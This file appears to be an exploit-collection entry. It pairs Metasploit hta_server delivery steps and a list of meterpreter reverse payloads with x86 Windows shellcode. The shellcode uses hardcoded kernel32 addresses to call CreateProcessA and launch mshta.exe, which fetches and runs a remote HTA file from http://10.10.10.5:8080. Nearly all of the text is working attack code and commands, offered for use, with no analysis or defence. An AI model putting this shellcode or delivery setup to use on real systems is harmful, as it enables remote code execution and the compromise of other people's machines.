# windows/patchupmeterpreter/reverse_ipv6_tcp
# windows/patchupmeterpreter/reverse_nonx_tcp
# windows/patchupmeterpreter/reverse_ord_tcp
# windows/patchupmeterpreter/reverse_tcp
# windows/patchupmeterpreter/reverse_tcp_allports
# "hta_server" exploit payloads setting example:
# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)
# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)
# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)
# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)
# msf6 exploit(windows/misc/hta_server) > run (second stage delivery server execution)
# Shellcode considerations:
# Function address of CreateProcessA in kernel32.dll: 0x75732082
# Function address of ExitProcess in kernel32.dll: 0x7578214f
# Size in bytes of message db parameter, 65 bytes -> 0x41 hex
# Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit
# Assembly Shellcode:
global _start
section .text
_start:
jmp application
firststep:
pop edi
xor eax, eax
mov [edi+65], al ; size in bytes of message db parameter
StartUpInfoANDProcessInformation:
push eax ; hStderror null in this case
push eax ; hStdOutput, null
push eax ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12 ; 18 times loop to fill both structures.
looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101 ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44 ; cb=0x44
lea eax, [esp+0x10] ; eax points to StartUpInfo
; eax has a pointer to StartUPinfo
; esp has a pointer to Process_Info containing null values
createprocessA:
push esp ; pointer to Process-Info
push eax ; pointer to StartUpInfo
xor ebx, ebx
push ebx ; null
push ebx ; null
push ebx ; null
inc ebx
push ebx ; bInheritHandles=true
dec ebx
push ebx ; null
push ebx ; null
push edi ; pointer to message db string
push ebx ; null
mov edx, 0x75732082 ; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:
push eax ; createprocessA return in eax
mov edx, 0x7578214f ; ExitProcess addr in kernel32.dll
call edx
application:
call firststep
message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta"